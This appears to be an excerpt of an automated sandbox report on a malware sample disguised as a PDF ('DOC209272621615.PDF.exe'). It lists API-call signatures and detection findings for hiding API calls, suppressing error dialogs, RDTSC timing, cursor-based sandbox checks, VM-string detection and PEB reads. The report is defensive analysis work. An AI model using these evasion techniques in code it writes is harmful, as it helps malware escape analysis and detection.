Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00452B78 SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,		6_2_00452B78
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00422EE0 IsIconic,GetWindowPlacement,GetWindowRect,		6_2_00422EE0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004414CC IsIconic,GetCapture,		6_2_004414CC
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00441DD4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,		6_2_00441DD4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,		10_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_0045676C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,		10_2_0045676C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00442700 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,		10_2_00442700
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00456830 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,		10_2_00456830
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00452B78 SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,		10_2_00452B78
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00422EE0 IsIconic,GetWindowPlacement,GetWindowRect,		10_2_00422EE0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_004414CC IsIconic,GetCapture,		10_2_004414CC
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00441DD4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,		10_2_00441DD4

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 6_2_004474DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

6_2_004474DC

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe	RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mobsync.exe	RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mobsync.exe	RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000002E98604 second address: 0000000002E9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000002E9899E second address: 0000000002E989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000003458604 second address: 000000000345860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 000000000345899E second address: 00000000034589A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\explorer.exe TID: 7008

Thread sleep time: -60000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 7_2_010F6DE6 rdtsc

7_2_010F6DE6

Contains functionality to detect sandboxes (mouse cursor move detection)

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		6_2_004552FC
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		10_2_004552FC

Queries a list of all running processes

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		6_2_00405CBC
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		10_2_00405CBC

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: explorer.exe, 00000009.00000000.386760657.00000000047D0000.00000004.00000001.sdmp	Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.355102319.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000009.00000000.346471893.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WerFault.exe, 00000005.00000002.329804705.0000000004DD0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(=
Source: explorer.exe, 00000009.00000000.346471893.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: DOC209272621615.PDF.exe, 00000000.00000000.296304584.0000000000794000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294280203.0000000000769000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000002.331410087.0000000000769000.00000004.00000020.sdmp, WerFault.exe, 00000005.00000002.329918378.0000000004E0D000.00000004.00000001.sdmp, Wkklnmcz.exe, 0000000A.00000002.350293403.000000000076F000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000003.791240894.0000000000529000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000003.791257315.00000000004F3000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.811474561.00000000004F4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000005.00000002.329918378.0000000004E0D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWheduler-0000
Source: explorer.exe, 00000009.00000000.375047296.000000000EFE4000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_0045ED90 LoadLibraryA,GetProcAddress,

0_2_0045ED90

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 7_2_010F6DE6 rdtsc

7_2_010F6DE6

Contains functionality to read the PEB

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9100 mov eax, dword ptr fs:[00000030h]		7_2_010B9100
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9100 mov eax, dword ptr fs:[00000030h]		7_2_010B9100
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9100 mov eax, dword ptr fs:[00000030h]		7_2_010B9100
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0113A537 mov eax, dword ptr fs:[00000030h]		7_2_0113A537
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188D34 mov eax, dword ptr fs:[00000030h]		7_2_01188D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120 mov eax, dword ptr fs:[00000030h]		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120 mov eax, dword ptr fs:[00000030h]		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120 mov eax, dword ptr fs:[00000030h]		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120 mov eax, dword ptr fs:[00000030h]		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120 mov ecx, dword ptr fs:[00000030h]		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E513A mov eax, dword ptr fs:[00000030h]		7_2_010E513A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E513A mov eax, dword ptr fs:[00000030h]		7_2_010E513A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4D3B mov eax, dword ptr fs:[00000030h]		7_2_010E4D3B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4D3B mov eax, dword ptr fs:[00000030h]		7_2_010E4D3B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4D3B mov eax, dword ptr fs:[00000030h]		7_2_010E4D3B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h]		7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BAD30 mov eax, dword ptr fs:[00000030h]		7_2_010BAD30
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DB944 mov eax, dword ptr fs:[00000030h]		7_2_010DB944
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DB944 mov eax, dword ptr fs:[00000030h]		7_2_010DB944
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F3D43 mov eax, dword ptr fs:[00000030h]		7_2_010F3D43
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01133540 mov eax, dword ptr fs:[00000030h]		7_2_01133540
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D7D50 mov eax, dword ptr fs:[00000030h]		7_2_010D7D50
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BC962 mov eax, dword ptr fs:[00000030h]		7_2_010BC962
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BB171 mov eax, dword ptr fs:[00000030h]		7_2_010BB171
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BB171 mov eax, dword ptr fs:[00000030h]		7_2_010BB171
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DC577 mov eax, dword ptr fs:[00000030h]		7_2_010DC577
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DC577 mov eax, dword ptr fs:[00000030h]		7_2_010DC577
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h]		7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h]		7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h]		7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h]		7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h]		7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA185 mov eax, dword ptr fs:[00000030h]		7_2_010EA185
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DC182 mov eax, dword ptr fs:[00000030h]		7_2_010DC182
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h]		7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h]		7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h]		7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h]		7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EFD9B mov eax, dword ptr fs:[00000030h]		7_2_010EFD9B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EFD9B mov eax, dword ptr fs:[00000030h]		7_2_010EFD9B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2990 mov eax, dword ptr fs:[00000030h]		7_2_010E2990
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h]		7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h]		7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h]		7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h]		7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E61A0 mov eax, dword ptr fs:[00000030h]		7_2_010E61A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E61A0 mov eax, dword ptr fs:[00000030h]		7_2_010E61A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E35A1 mov eax, dword ptr fs:[00000030h]		7_2_010E35A1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011805AC mov eax, dword ptr fs:[00000030h]		7_2_011805AC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011805AC mov eax, dword ptr fs:[00000030h]		7_2_011805AC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011369A6 mov eax, dword ptr fs:[00000030h]		7_2_011369A6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h]		7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h]		7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h]		7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov ecx, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h]		7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01168DF1 mov eax, dword ptr fs:[00000030h]		7_2_01168DF1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h]		7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h]		7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h]		7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CD5E0 mov eax, dword ptr fs:[00000030h]		7_2_010CD5E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CD5E0 mov eax, dword ptr fs:[00000030h]		7_2_010CD5E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011441E8 mov eax, dword ptr fs:[00000030h]		7_2_011441E8
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h]		7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h]		7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h]		7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01184015 mov eax, dword ptr fs:[00000030h]		7_2_01184015
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01184015 mov eax, dword ptr fs:[00000030h]		7_2_01184015
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h]		7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h]		7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h]		7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h]		7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h]		7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h]		7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h]		7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h]		7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EBC2C mov eax, dword ptr fs:[00000030h]		7_2_010EBC2C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h]		7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h]		7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h]		7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h]		7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h]		7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h]		7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h]		7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h]		7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h]		7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114C450 mov eax, dword ptr fs:[00000030h]		7_2_0114C450
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114C450 mov eax, dword ptr fs:[00000030h]		7_2_0114C450
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA44B mov eax, dword ptr fs:[00000030h]		7_2_010EA44B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D0050 mov eax, dword ptr fs:[00000030h]		7_2_010D0050
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D0050 mov eax, dword ptr fs:[00000030h]		7_2_010D0050
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D746D mov eax, dword ptr fs:[00000030h]		7_2_010D746D
